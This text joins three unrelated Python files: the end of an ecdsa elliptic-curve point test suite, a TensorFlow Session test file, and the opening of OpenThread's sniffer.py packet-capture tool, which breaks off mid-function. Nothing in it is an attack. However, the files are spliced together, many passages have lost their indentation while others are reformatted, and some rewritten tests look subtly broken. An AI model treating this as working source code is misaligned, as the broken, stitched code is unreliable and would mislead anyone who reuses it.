j_g = PointJacobi.from_affine(generator_256)
w_a = j_g * 2
self.assertEqual(j_g.mul_add(1, w_a, 1), j_g * 3)
def test_mul_add_slightly_different(self):
j_g = PointJacobi.from_affine(generator_256)
w_a = j_g * 2
w_b = j_g * 3
self.assertEqual(w_a.mul_add(1, w_b, 3), w_a * 1 + w_b * 3)
def test_mul_add(self):
j_g = PointJacobi.from_affine(generator_256)
w_a = generator_256 * 255
w_b = generator_256 * (0xA8 * 0xF0)
j_b = j_g * 0xA8
ret = j_g.mul_add(255, j_b, 0xF0)
self.assertEqual(ret.to_affine(), w_a + w_b)
def test_mul_add_large(self):
j_g = PointJacobi.from_affine(generator_256)
b = PointJacobi.from_affine(j_g * 255)
self.assertEqual(j_g * 256, j_g + b)
self.assertEqual(
j_g * (0xFF00 + 255 * 0xF0F0), j_g * 0xFF00 + b * 0xF0F0
)
self.assertEqual(
j_g * (0xFF00 + 255 * 0xF0F0), j_g.mul_add(0xFF00, b, 0xF0F0)
)
def test_mul_add_with_infinity_as_result(self):
j_g = PointJacobi.from_affine(generator_256)
order = generator_256.order()
b = PointJacobi.from_affine(generator_256 * 256)
self.assertEqual(j_g.mul_add(order % 256, b, order // 256), INFINITY)
def test_mul_add_without_order(self):
j_g = PointJacobi(curve_256, generator_256.x(), generator_256.y(), 1)
order = generator_256.order()
w_b = generator_256 * 34
w_b.scale()
b = PointJacobi(curve_256, w_b.x(), w_b.y(), 1)
self.assertEqual(j_g.mul_add(order % 34, b, order // 34), INFINITY)
def test_mul_add_with_doubled_negation_of_itself(self):
j_g = PointJacobi.from_affine(generator_256 * 17)
dbl_neg = 2 * (-j_g)
self.assertEqual(j_g.mul_add(4, dbl_neg, 2), INFINITY)
def test_equality(self):
pj1 = PointJacobi(curve=CurveFp(23, 1, 1, 1), x=2, y=3, z=1, order=1)
pj2 = PointJacobi(curve=CurveFp(23, 1, 1, 1), x=2, y=3, z=1, order=1)
self.assertEqual(pj1, pj2)
def test_equality_with_invalid_object(self):
j_g = PointJacobi.from_affine(generator_256)
self.assertNotEqual(j_g, 12)
def test_equality_with_wrong_curves(self):
p_a = PointJacobi.from_affine(generator_256)
p_b = PointJacobi.from_affine(generator_224)
self.assertNotEqual(p_a, p_b)
def test_pickle(self):
pj = PointJacobi(curve=CurveFp(23, 1, 1, 1), x=2, y=3, z=1, order=1)
self.assertEqual(pickle.loads(pickle.dumps(pj)), pj)
    @settings(**NO_OLD_SETTINGS)
    @given(st.integers(min_value=1, max_value=10))
    def test_multithreading(self, thread_num):
        """Racing threads must converge on one consistent precompute table."""
        # ensure that generator's precomputation table is filled
        generator_112r2 * 2
        # create a fresh point that doesn't have a filled precomputation table
        gen = generator_112r2
        gen = PointJacobi(gen.curve(), gen.x(), gen.y(), 1, gen.order(), True)
        self.assertEqual(gen._PointJacobi__precompute, [])

        def runner(generator):
            # Hammer the precomputation path with random multiplications.
            order = generator.order()
            for _ in range(10):
                generator * randrange(order)

        threads = []
        for _ in range(thread_num):
            threads.append(threading.Thread(target=runner, args=(gen,)))
        for t in threads:
            t.start()
        # Also run on the main thread to join the race.
        runner(gen)
        for t in threads:
            t.join()
        # Whatever the interleaving, the table must match the canonical one.
        self.assertEqual(
            gen._PointJacobi__precompute,
            generator_112r2._PointJacobi__precompute,
        )
@pytest.mark.skipif(
platform.system() == "Windows",
reason="there are no signals on Windows",
)
def test_multithreading_with_interrupts(self):
thread_num = 10
# ensure that generator's precomputation table is filled
generator_112r2 * 2
# create a fresh point that doesn't have a filled precomputation table
gen = generator_112r2
gen = PointJacobi(gen.curve(), gen.x(), gen.y(), 1, gen.order(), True)
self.assertEqual(gen._PointJacobi__precompute, [])
def runner(generator):
order = generator.order()
for _ in range(50):
generator * randrange(order)
def interrupter(barrier_start, barrier_end, lock_exit):
# wait until MainThread can handle KeyboardInterrupt
barrier_start.release()
barrier_end.acquire()
os.kill(os.getpid(), signal.SIGINT)
lock_exit.release()
threads = []
for _ in range(thread_num):
threads.append(threading.Thread(target=runner, args=(gen,)))
barrier_start = threading.Lock()
barrier_start.acquire()
barrier_end = threading.Lock()
barrier_end.acquire()
lock_exit = threading.Lock()
lock_exit.acquire()
threads.append(
threading.Thread(
target=interrupter,
args=(barrier_start, barrier_end, lock_exit),
)
)
for t in threads:
t.start()
with self.assertRaises(KeyboardInterrupt):
# signal to interrupter that we can now handle the signal
barrier_start.acquire()
barrier_end.release()
runner(gen)
# use the lock to ensure we never go past the scope of
# assertRaises before the os.kill is called
lock_exit.acquire()
for t in threads:
t.join()
self.assertEqual(
gen._PointJacobi__precompute,
generator_112r2._PointJacobi__precompute,
)
|
session_test.py | """Tests for tensorflow.python.client.session.Session."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import threading
import time
import tensorflow.python.platform
import numpy as np
import six
from six.moves import xrange # pylint: disable=redefined-builtin
from tensorflow.core.framework import config_pb2
from tensorflow.core.lib.core import error_codes_pb2
from tensorflow.python.client import session
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_util
from tensorflow.python.framework import test_util
from tensorflow.python.framework import types
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import constant_op
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import state_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import googletest
# NOTE(mrry): Dummy shape registration for op used in the tests.
ops.RegisterShape('ConstructionFails')(None)
class SessionTest(test_util.TensorFlowTestCase):
def testUseExistingGraph(self):
with ops.Graph().as_default() as g, ops.device('/cpu:0'):
a = constant_op.constant(6.0, shape=[1, 1])
b = constant_op.constant(7.0, shape=[1, 1])
c = math_ops.matmul(a, b, name='matmul')
with session.Session(graph=g):
result = c.eval()
self.assertAllEqual(result, [[42.0]])
def testUseDefaultGraph(self):
with ops.Graph().as_default(), ops.device('/cpu:0'):
a = constant_op.constant(6.0, shape=[1, 1])
b = constant_op.constant(7.0, shape=[1, 1])
c = math_ops.matmul(a, b, name='matmul')
with session.Session():
result = c.eval()
self.assertAllEqual(result, [[42.0]])
def testCreate(self):
with session.Session():
inp = constant_op.constant(10.0, name='W1')
copy = array_ops.identity(inp)
# Test with feed.
# TODO(mrry): Investigate why order='F' didn't work.
arr = np.asarray([[0, 1, 2], [3, 4, 5]], dtype=np.float32, order='C')
copy_val = copy.eval({'W1:0': arr})
self.assertAllEqual(arr, copy_val)
# Test without feed.
copy_val = copy.eval()
self.assertAllEqual(np.asarray(10.0, dtype=np.float32), copy_val)
def testManyCPUs(self):
# TODO(keveman): Implement ListDevices and test for the number of
# devices returned by ListDevices.
with session.Session(
config=config_pb2.ConfigProto(device_count={'CPU': 2})):
inp = constant_op.constant(10.0, name='W1')
self.assertAllEqual(inp.eval(), 10.0)
def testErrorsReported(self):
with session.Session() as s:
constant_op.constant(10.0, name='W1')
with self.assertRaises(ValueError):
s.run('foo:0')
def testErrorPayload(self):
with session.Session():
a = array_ops.placeholder(types.float32)
with self.assertRaisesOpError(lambda e: e.op == a.op):
a.eval()
def testOpConstructionErrorPayload(self):
with session.Session():
failing_op = ops.get_default_graph().create_op(
'ConstructionFails', [], [], name='f')
def exc_predicate(e):
return (e.op == failing_op
and e.error_code == error_codes_pb2.INVALID_ARGUMENT)
with self.assertRaisesOpError(exc_predicate):
failing_op.run()
def testErrorBasedOn(self):
with session.Session() as sess:
a = constant_op.constant(0.0, shape=[2, 3])
# NOTE(mrry): The original_op is nonsense, but used here to test that the
# errors are reported correctly.
# pylint: disable=protected-access
with sess.graph._original_op(a.op):
b = array_ops.identity(a, name='id')
with sess.graph._original_op(b.op):
c = array_ops.placeholder(types.float32)
# pylint: enable=protected-access
def exc_predicate(e):
return (e.op == c.op
and e.op._original_op == b.op
and e.op._original_op._original_op == a.op)
with self.assertRaisesOpError(exc_predicate):
c.eval()
def testFetchTensorObject(self):
with session.Session() as s:
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[2, 3])
c = math_ops.matmul(a, b)
results_with_list = s.run([c])
self.assertAllEqual([[4.0, 4.0, 4.0]], results_with_list[0])
results_with_single = s.run(c)
self.assertAllEqual([[4.0, 4.0, 4.0]], results_with_single)
results_with_get = c.eval()
self.assertAllEqual([[4.0, 4.0, 4.0]], results_with_get)
a_val, b_val = s.run([a, b]) # Test multiple fetches.
self.assertAllEqual([[1.0, 1.0]], a_val)
self.assertAllEqual([[2.0, 2.0, 2.0], [2.0, 2.0, 2.0]], b_val)
def testFetchScalar(self):
with session.Session() as s:
for scalar in np.int32, np.int64, np.float32, np.float64:
x = scalar(7)
y = scalar(8)
tf_x = constant_op.constant(x, shape=[])
tf_y = constant_op.constant(y)
tf_xy = math_ops.add(tf_x, tf_y)
# Single fetch
xy = s.run(tf_xy)
self.assertEqual(scalar, type(xy))
self.assertEqual(x + y, xy)
# List fetch
xy, = s.run([tf_xy])
self.assertEqual(scalar, type(xy))
self.assertEqual(x + y, xy)
def testFetchOperationObject(self):
with session.Session() as s:
a = constant_op.constant(1.0, shape=[1, 2])
v = variables.Variable(a, name='testFetchOperationObject_v')
s.run(v.initializer)
v_val = s.run(v)
self.assertAllEqual([[1.0, 1.0]], v_val)
def testFetchSparseTensor(self):
with session.Session() as s:
indices = np.array([[3, 2, 0], [4, 5, 1]]).astype(np.int64)
values = np.array([1.0, 2.0]).astype(np.float32)
shape = np.array([7, 9, 2]).astype(np.int64)
sp = ops.SparseTensor(
constant_op.constant(indices),
constant_op.constant(values),
constant_op.constant(shape))
# Single fetch, use as tuple
sp_out = s.run(sp)
indices_out, values_out, shape_out = sp_out
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
# Single fetch, use as SparseTensorValue
sp_out = s.run(sp)
self.assertAllEqual(sp_out.indices, indices)
self.assertAllEqual(sp_out.values, values)
self.assertAllEqual(sp_out.shape, shape)
# Tuple fetch, use as tuple
indices_out, values_out, shape_out = s.run(sp)
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
# List fetch, use as tuple
(indices_out, values_out, shape_out), = s.run([sp])
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
# List fetch, use as SparseTensorValue
sp_out, = s.run([sp])
self.assertAllEqual(sp_out.indices, indices)
self.assertAllEqual(sp_out.values, values)
self.assertAllEqual(sp_out.shape, shape)
def testFeedSparseTensor(self):
with session.Session() as s:
indices = np.array([[3, 2, 0], [4, 5, 1]]).astype(np.int64)
values = np.array([1.0, 2.0]).astype(np.float32)
shape = np.array([7, 9, 2]).astype(np.int64)
sp = ops.SparseTensor(
array_ops.placeholder(dtype=np.int64, shape=(2, 3)),
array_ops.placeholder(dtype=np.float32, shape=(2,)),
array_ops.placeholder(dtype=np.int64, shape=(3,)),)
sp_indices = array_ops.identity(sp.indices)
sp_values = array_ops.identity(sp.values)
sp_shape = array_ops.identity(sp.shape)
sp2 = ops.SparseTensor(sp_indices, sp_values, sp_shape)
# Feed with tuple
indices_out, values_out, shape_out = s.run(
[sp_indices, sp_values, sp_shape], {sp: (indices, values, shape)})
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
# Feed with SparseTensorValue
indices_out, values_out, shape_out = s.run(
[sp_indices, sp_values, sp_shape],
{sp: ops.SparseTensorValue(indices, values, shape)})
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
# Feed with SparseTensorValue, fetch SparseTensorValue
sp2_out = s.run(sp2, {sp: ops.SparseTensorValue(indices, values, shape)})
self.assertAllEqual(sp2_out.indices, indices)
self.assertAllEqual(sp2_out.values, values)
self.assertAllEqual(sp2_out.shape, shape)
def testExtendWithStatelessOperations(self):
with session.Session() as s:
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[2, 3])
c = math_ops.matmul(a, b)
c_val = s.run(c)
self.assertAllEqual([[4.0, 4.0, 4.0]], c_val)
d = constant_op.constant([1.0, 2.0, 3.0], shape=[3, 1])
e = math_ops.matmul(c, d)
# Extend will happen here.
e_val = s.run(e)
self.assertAllEqual([[24.0]], e_val)
def testExtendWithStatefulOperations(self):
with session.Session() as s:
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[2, 3])
c = math_ops.matmul(a, b)
v = variables.Variable(c, name='testExtendWithStatefulOperations_v')
v.initializer.run()
v_val = v.eval()
self.assertAllEqual([[4.0, 4.0, 4.0]], v_val)
d = constant_op.constant(3.0, shape=[2, 3])
e = math_ops.matmul(a, d)
assign_e_to_v = state_ops.assign(v, e)
# Extend will happen here.
e_val = e.eval()
self.assertAllEqual([[6.0, 6.0, 6.0]], e_val)
v_val = v.eval()
self.assertAllEqual([[4.0, 4.0, 4.0]], v_val)
s.run(assign_e_to_v)
v_val = v.eval()
self.assertAllEqual([[6.0, 6.0, 6.0]], v_val)
def testExtendWithGroupBy(self):
with session.Session() as s:
a = constant_op.constant(1.0, shape=[1, 2])
p = variables.Variable(a, name='testExtendWithGroupBy_p')
a_val = a.eval() # Force an Extend after this op.
self.assertAllEqual([[1.0, 1.0]], a_val)
b = constant_op.constant(2.0, shape=[1, 2])
q = variables.Variable(b, name='testExtendWithGroupBy_q')
# Extend will happen here.
init = control_flow_ops.group(p.initializer, q.initializer)
s.run(init)
p_val, q_val = s.run([p, q])
self.assertAllEqual([[1.0, 1.0]], p_val)
self.assertAllEqual([[2.0, 2.0]], q_val)
def testTensorGetMethod(self):
with session.Session():
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[2, 3])
c = math_ops.matmul(a, b)
c_val = c.eval()
self.assertAllEqual([[4.0, 4.0, 4.0]], c_val)
fed_c_val = c.eval(feed_dict={a.name: [[4.0, 4.0]]})
self.assertAllEqual([[16.0, 16.0, 16.0]], fed_c_val)
def testOperationRunMethod(self):
with session.Session():
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[1, 2], name='b')
v = variables.Variable(a, a.dtype)
assign_a_to_v = state_ops.assign(v, a)
assign_a_to_v.eval()
v_val = v.eval()
self.assertAllEqual([[1.0, 1.0]], v_val)
assign_b_to_v = state_ops.assign(v, b)
assign_b_to_v.eval()
v_val = v.eval()
self.assertAllEqual([[2.0, 2.0]], v_val)
assign_b_to_v.eval(feed_dict={'b:0': [[3.0, 3.0]]})
v_val = v.eval()
self.assertAllEqual([[3.0, 3.0]], v_val)
def testDefaultGraph(self):
with session.Session() as s:
self.assertEqual(ops.get_default_graph(), s.graph)
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[2, 3])
self.assertEqual(ops.get_default_graph(), a.graph)
self.assertEqual(ops.get_default_graph(), b.graph)
c = math_ops.matmul(a, b)
v = variables.Variable(c, name='testDefaultGraph_v')
v.initializer.run()
v_val = v.eval()
self.assertAllEqual([[4.0, 4.0, 4.0]], v_val)
d = constant_op.constant(3.0, shape=[2, 3])
e = math_ops.matmul(a, d)
assign_e_to_v = state_ops.assign(v, e)
e_val = e.eval()
self.assertAllEqual([[6.0, 6.0, 6.0]], e_val)
v_val = v.eval()
self.assertAllEqual([[4.0, 4.0, 4.0]], v_val)
s.run(assign_e_to_v)
v_val = v.eval()
self.assertAllEqual([[6.0, 6.0, 6.0]], v_val)
self.assertEqual(ops.get_default_graph(), s.graph)
def _testDefaultGraphInThread(self, constructed_event, continue_event, i):
    """Worker for testDefaultGraphWithThreads; uses a per-thread graph.

    Args:
      constructed_event: set once this thread has built its graph.
      continue_event: waited on so all threads build before any runs.
      i: thread index, used to give the Variable a unique name.
    """
    with session.Session() as s:
        self.assertEqual(ops.get_default_graph(), s.graph)
        a = constant_op.constant(1.0, shape=[1, 2])
        b = constant_op.constant(2.0, shape=[2, 3])
        c = math_ops.matmul(a, b)
        v = variables.Variable(c, name='var_%d' % i)

        # Block here until all threads have constructed their graph.
        constructed_event.set()
        continue_event.wait()

        assign_c_to_v = state_ops.assign(v, c)
        v.initializer.run()
        assign_c_to_v.eval()
        v_val = v.eval()
        self.assertAllEqual([[4.0, 4.0, 4.0]], v_val)
        d = constant_op.constant(3.0, shape=[2, 3])
        e = math_ops.matmul(a, d)
        assign_e_to_v = state_ops.assign(v, e)
        # Evaluating e does not run the assign; v is unchanged until s.run().
        e_val = e.eval()
        self.assertAllEqual([[6.0, 6.0, 6.0]], e_val)
        v_val = v.eval()
        self.assertAllEqual([[4.0, 4.0, 4.0]], v_val)
        s.run(assign_e_to_v)
        v_val = v.eval()
        self.assertAllEqual([[6.0, 6.0, 6.0]], v_val)
        self.assertEqual(ops.get_default_graph(), s.graph)
def testDefaultGraphWithThreads(self):
    """Ten threads each build and run in their own thread-local default graph."""
    constructed_events = [threading.Event() for _ in range(10)]
    continue_event = threading.Event()
    workers = [
        self.checkedThread(target=self._testDefaultGraphInThread,
                           args=(event, continue_event, index))
        for index, event in enumerate(constructed_events)
    ]
    for worker in workers:
        worker.start()
    # Wait until every thread has built its graph, then release them all.
    for event in constructed_events:
        event.wait()
    continue_event.set()
    for worker in workers:
        worker.join()
def testParallelRun(self):
    """100 threads may call eval() on the same session concurrently."""
    with session.Session() as sess:
        five = constant_op.constant(5.0)
        start_gate = threading.Event()

        def worker():
            # All workers block on the gate so the runs overlap.
            start_gate.wait()
            self.assertEqual(five.eval(session=sess), 5.0)

        workers = [self.checkedThread(target=worker) for _ in range(100)]
        for w in workers:
            w.start()
        start_gate.set()
        for w in workers:
            w.join()
def testRunFeedDict(self):
    """Feeds are accepted keyed by tensor, by name, and as plain lists."""
    with session.Session() as s:
        x = array_ops.zeros([2])
        # Key the feed by the tensor object itself.
        y = s.run(2 * x, feed_dict={x: np.ones(2).astype(np.float32)})
        self.assertAllEqual(y, 2 * np.ones(2))
        # Key the feed by the tensor's string name.
        y = s.run(2 * x, feed_dict={x.name: np.ones(2).astype(np.float32)})
        self.assertAllEqual(y, 2 * np.ones(2))
        # Feed values may also be plain Python lists.
        y = s.run(2 * x, feed_dict={x: [1, 1]})
        assert (y == 2 * np.ones(2)).all()
def testGraphDef(self):
    """sess.graph_def reflects nodes as they are added to the graph."""
    with session.Session() as sess:
        # A fresh session starts with an empty GraphDef.
        self.assertProtoEquals('', sess.graph_def)
        c = constant_op.constant(5.0, name='c')
        self.assertEquals(len(sess.graph_def.node), 1)
        d = constant_op.constant(6.0, name='d')
        self.assertEquals(len(sess.graph_def.node), 2)
        self.assertAllEqual(c.eval(), 5.0)
        self.assertAllEqual(d.eval(), 6.0)
        # Nodes added even after a run still show up in graph_def.
        e = constant_op.constant(7.0, name='e')
        self.assertEquals(len(sess.graph_def.node), 3)
        self.assertAllEqual(e.eval(), 7.0)
def testUseAfterClose(self):
    """Running an op after the session context exits raises RuntimeError."""
    with session.Session() as sess:
        c = constant_op.constant(5.0)
        self.assertAllEqual(sess.run(c), 5.0)
    # Leaving the 'with' block closes the session; further runs must fail.
    with self.assertRaisesWithPredicateMatch(
        RuntimeError, lambda e: 'Attempted to use a closed Session.' in str(e)):
        sess.run(c)
def testUseAfterCloseConcurrent(self):
    """Closing a session makes concurrent run() calls fail cleanly."""
    with session.Session() as sess:
        c = constant_op.constant(5.0)
        self.assertAllEqual(sess.run(c), 5.0)

        def update_thread():
            # Loop until the main thread closes the session; the close must
            # surface here as a RuntimeError rather than a hang or crash.
            with self.assertRaisesWithPredicateMatch(
                RuntimeError,
                lambda e: 'Attempted to use a closed Session.' in str(e)):
                while True:
                    sess.run(c)
        t = threading.Thread(target=update_thread)
        t.start()
        time.sleep(0.1)
        sess.close()
        t.join()
def testNotEntered(self):
    """A session never entered via 'with' does not become the default session."""
    # pylint: disable=protected-access
    self.assertEqual(ops._default_session_stack.get_default(), None)
    # pylint: enable=protected-access
    with ops.device('/cpu:0'):
        sess = session.Session()
        c_1 = constant_op.constant(5.0)
        with sess.graph.as_default():
            c_2 = constant_op.constant(5.0)
        self.assertEqual(c_1.graph, c_2.graph)
        self.assertEqual(sess.run(c_2), 5.0)
        # eval() needs a default session; sess was never registered as one.
        with self.assertRaisesWithPredicateMatch(
            ValueError, lambda e: 'No default session is registered.' in str(e)):
            c_2.eval()
def testInteractive(self):
    """InteractiveSession installs itself as default so eval() needs no session."""
    with ops.device('/cpu:0'):
        sess = session.InteractiveSession()
        left = constant_op.constant(1.0, shape=[1, 2])
        right = constant_op.constant(2.0, shape=[2, 3])
        product = math_ops.matmul(left, right)
        self.assertAllEqual([[4.0, 4.0, 4.0]], product.eval())
        column = constant_op.constant([1.0, 2.0, 3.0], shape=[3, 1])
        reduced = math_ops.matmul(product, column)
        self.assertAllEqual([[24.0]], reduced.eval())
        sess.close()
def testSharedGraph(self):
    """Two sessions created over the same graph compute identical results."""
    with ops.Graph().as_default() as g, ops.device('/cpu:0'):
        lhs = constant_op.constant(1.0, shape=[1, 2])
        rhs = constant_op.constant(2.0, shape=[2, 3])
        product = math_ops.matmul(lhs, rhs)
        with session.Session(graph=g) as sess_a:
            with session.Session(graph=g) as sess_b:
                self.assertAllEqual(sess_a.run(product), sess_b.run(product))
def testDuplicatedInputs(self):
    """Fetching the same tensor twice in one run() call is allowed."""
    with session.Session() as sess:
        a = constant_op.constant(1.0, shape=[1, 2])
        b = constant_op.constant(2.0, shape=[1, 3])
        # 'a' appears twice in the fetch list; both results must match.
        a_val, b_val, a2_val = sess.run([a, b, a])
        self.assertAllEqual(a_val, [[1.0, 1.0]])
        self.assertAllEqual(b_val, [[2.0, 2.0, 2.0]])
        self.assertAllEqual(a2_val, [[1.0, 1.0]])
def testFeedAndFetch(self):
    """Round-trip every supported dtype and several shapes through a feed."""
    with session.Session():
        for dtype in [types.float32,
                      types.float64,
                      types.int32,
                      types.uint8,
                      types.int16,
                      types.int8,
                      types.int64,
                      types.bool,
                      types.complex64]:
            # Includes zero-size shapes to exercise empty-tensor handling.
            for shape in [(32, 4, 128), (37,), (2, 0, 6), (0, 0, 0)]:
                np_dtype = dtype.as_numpy_dtype
                feed_t = array_ops.placeholder(dtype=dtype, shape=shape)
                out_t = array_ops.identity(feed_t)
                np_array = np.random.randint(-10, 10, shape)
                if dtype == types.bool:
                    np_array = np_array > 0
                elif dtype == types.complex64:
                    # Cast to complex first so sqrt of negative values
                    # yields complex numbers instead of NaN.
                    np_array = np.sqrt(np_array.astype(np_dtype))
                else:
                    np_array = np_array.astype(np_dtype)
                self.assertAllEqual(np_array,
                                    out_t.eval(feed_dict={feed_t: np_array}))
def testStringFetch(self):
    """String constants of various shapes (including empty) can be fetched."""
    with session.Session():
        for shape in [(32, 4, 128), (37,), (2, 0, 6), (0, 0, 0)]:
            # Total element count for the shape.
            size = 1
            for s in shape:
                size *= s
            # Zero-size shapes fall back to a plain empty list.
            c_list = np.array([str(i) for i in xrange(size)],
                              dtype=np.object).reshape(shape) if size > 0 else []
            c = constant_op.constant(c_list)
            self.assertAllEqual(c.eval(), c_list)
def testStringFeed(self):
    """Object arrays of strings round-trip through a string placeholder."""
    with session.Session():
        for shape in [(32, 4, 128), (37,), (2, 0, 6), (0, 0, 0)]:
            # Total element count for the shape.
            size = 1
            for s in shape:
                size *= s
            # reshape also works for size == 0 (empty object array).
            c_list = np.array([str(i) for i in xrange(size)],
                              dtype=np.object).reshape(shape)
            feed_t = array_ops.placeholder(dtype=types.string, shape=shape)
            c = array_ops.identity(feed_t)
            self.assertAllEqual(c.eval(feed_dict={feed_t: c_list}), c_list)
def testStringFeedWithNullCharacters(self):
    """Strings containing NUL bytes survive a feed/fetch round trip."""
    with session.Session():
        payload = ['\n\x01\x00', '\n\x00\x01']
        placeholder = array_ops.placeholder(dtype=types.string, shape=[2])
        passthrough = array_ops.identity(placeholder)
        fetched = passthrough.eval(feed_dict={placeholder: payload})
        self.assertEqual(payload[0], fetched[0])
        self.assertEqual(payload[1], fetched[1])
def testStringFeedWithUnicode(self):
    """Unicode feed values come back as UTF-8 encoded byte strings."""
    with session.Session():
        c_list = [u'\n\x01\x00', u'\n\x00\x01']
        feed_t = array_ops.placeholder(dtype=types.string, shape=[2])
        c = array_ops.identity(feed_t)
        # Feed as a plain list of unicode strings.
        out = c.eval(feed_dict={feed_t: c_list})
        self.assertEqual(c_list[0], out[0].decode('utf-8'))
        self.assertEqual(c_list[1], out[1].decode('utf-8'))
        # Feed as a numpy object array of unicode strings.
        out = c.eval(feed_dict={feed_t: np.array(c_list, dtype=np.object)})
        self.assertEqual(c_list[0], out[0].decode('utf-8'))
        self.assertEqual(c_list[1], out[1].decode('utf-8'))
def testInvalidTargetFails(self):
    """Constructing a Session with a bogus target string raises RuntimeError."""
    with self.assertRaises(RuntimeError):
        session.Session('INVALID_TARGET')
def testFetchByNameDifferentStringTypes(self):
    """Ops named with str/unicode/bytes/raw literals are all fetchable by name."""
    with session.Session() as sess:
        named_constants = [
            constant_op.constant(42.0, name='c'),
            constant_op.constant(43.0, name=u'd'),
            constant_op.constant(44.0, name=b'e'),
            constant_op.constant(45.0, name=r'f'),
        ]
        # Whatever string flavor was used at creation, .name is text.
        for tensor in named_constants:
            self.assertTrue(isinstance(tensor.name, six.text_type))
        cases = [('c', 42.0), ('d', 43.0), ('e', 44.0), ('f', 45.0)]
        for base, expected in cases:
            byte_handle = base + ':0'
            text_handle = byte_handle.decode('ascii')
            # The original literals 'x:0', u'x:0', b'x:0', r'x:0' collapse
            # at runtime to these byte/text values, in this order.
            for handle in (byte_handle, text_handle, byte_handle, byte_handle):
                self.assertEqual(expected, sess.run(handle))
def testIncorrectGraph(self):
    """A session only accepts fetches from the graph it was created with."""
    with ops.Graph().as_default() as g_1:
        c_1 = constant_op.constant(1.0, name='c')
    with ops.Graph().as_default() as g_2:
        c_2 = constant_op.constant(2.0, name='c')
    # Same op name in both graphs -- disambiguation is purely by graph.
    self.assertEqual('c', c_1.op.name)
    self.assertEqual('c', c_2.op.name)
    with session.Session(graph=g_1) as sess_1:
        self.assertEqual(1.0, sess_1.run(c_1))
        # Tensors/ops from the other graph must be rejected.
        with self.assertRaises(ValueError):
            sess_1.run(c_2)
        with self.assertRaises(ValueError):
            sess_1.run(c_2.op)
    with session.Session(graph=g_2) as sess_2:
        with self.assertRaises(ValueError):
            sess_2.run(c_1)
        with self.assertRaises(ValueError):
            sess_2.run(c_1.op)
        self.assertEqual(2.0, sess_2.run(c_2))
if __name__ == '__main__':
    # Run the Session test suite via TensorFlow's googletest wrapper.
    googletest.main()
|
sniffer.py | #!/usr/bin/env python3
#
# Copyright (c) 2016-2017, The OpenThread Authors.
# All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
Sniffer tool that outputs raw pcap.
Real-time stream to wireshark:
./sniffer.py | wireshark -k -i -
Save stream to file or pipe:
./sniffer.py > trace.pcap
"""
import sys
import optparse
import time
import os
import threading
from datetime import datetime
import spinel.util as util
import spinel.config as CONFIG
from spinel.const import SPINEL
from spinel.codec import WpanApi
from spinel.stream import StreamOpen
from spinel.pcap import PcapCodec
if sys.platform == 'win32':
import ctypes
import msvcrt
# Nodeid is required to execute ot-ncp-ftd for its sim radio socket port.
# This is maximum that works for MacOS.
DEFAULT_NODEID = 34  # same as WELLKNOWN_NODE_ID
DEFAULT_CHANNEL = 11  # default IEEE 802.15.4 channel to sniff on
DEFAULT_BAUDRATE = 115200  # UART baud rate used when none is given
# Libpcap data-link types written into the pcap global header.
DLT_IEEE802_15_4_WITHFCS = 195  # 802.15.4 frames with trailing FCS
DLT_IEEE802_15_4_TAP = 283  # 802.15.4 with TAP pseudo-header metadata
def parse_args():
    """Parse this tool's command line options; returns (options, leftover args)."""
    parser = optparse.OptionParser()
    # Transport selection: UART, pipe, or socket (default is an ot-ncp pipe).
    parser.add_option("-u", "--uart", action="store",
                      dest="uart", type="string")
    parser.add_option("-b", "--baudrate", action="store",
                      dest="baudrate", type="int", default=DEFAULT_BAUDRATE)
    parser.add_option("--rtscts", action="store_true",
                      dest="rtscts", default=False)
    parser.add_option("-p", "--pipe", action="store",
                      dest="pipe", type="string")
    parser.add_option("-s", "--socket", action="store",
                      dest="socket", type="string")
    parser.add_option("-n", "--nodeid", action="store",
                      dest="nodeid", type="string", default=str(DEFAULT_NODEID))
    parser.add_option("-d", "--debug", action="store",
                      dest="debug", type="int", default=CONFIG.DEBUG_ENABLE)
    # Output shaping.
    parser.add_option("-x", "--hex", action="store_true", dest="hex")
    parser.add_option("-o", "--output", action="store",
                      dest="output", type="string")
    parser.add_option("-c", "--channel", action="store",
                      dest="channel", type="int", default=DEFAULT_CHANNEL)
    # Pcap content / behavior toggles.
    parser.add_option('--crc', action='store_true',
                      dest='crc', default=False)
    parser.add_option('--rssi', action='store_true',
                      dest='rssi', default=False)
    parser.add_option('--no-reset', action='store_true',
                      dest='no_reset', default=False)
    parser.add_option('--tap', action='store_true',
                      dest='tap', default=False)
    parser.add_option('--is-fifo', action='store_true',
                      dest='is_fifo', default=False)
    parser.add_option('--use-host-timestamp', action='store_true',
                      dest='use_host_timestamp', default=False)
    return parser.parse_args(sys.argv[1:])
def sniffer_init(wpan_api, options):
"""" Send spinel commands to initialize sniffer node. """
wpan_api.queue_register(SPINEL.HEADER_DEFAULT)
wpan_api.queue_register(SPINEL.HEADER_ASYNC)
sys.stderr.write("Initializing sniffer...\n")
if not options.no_reset:
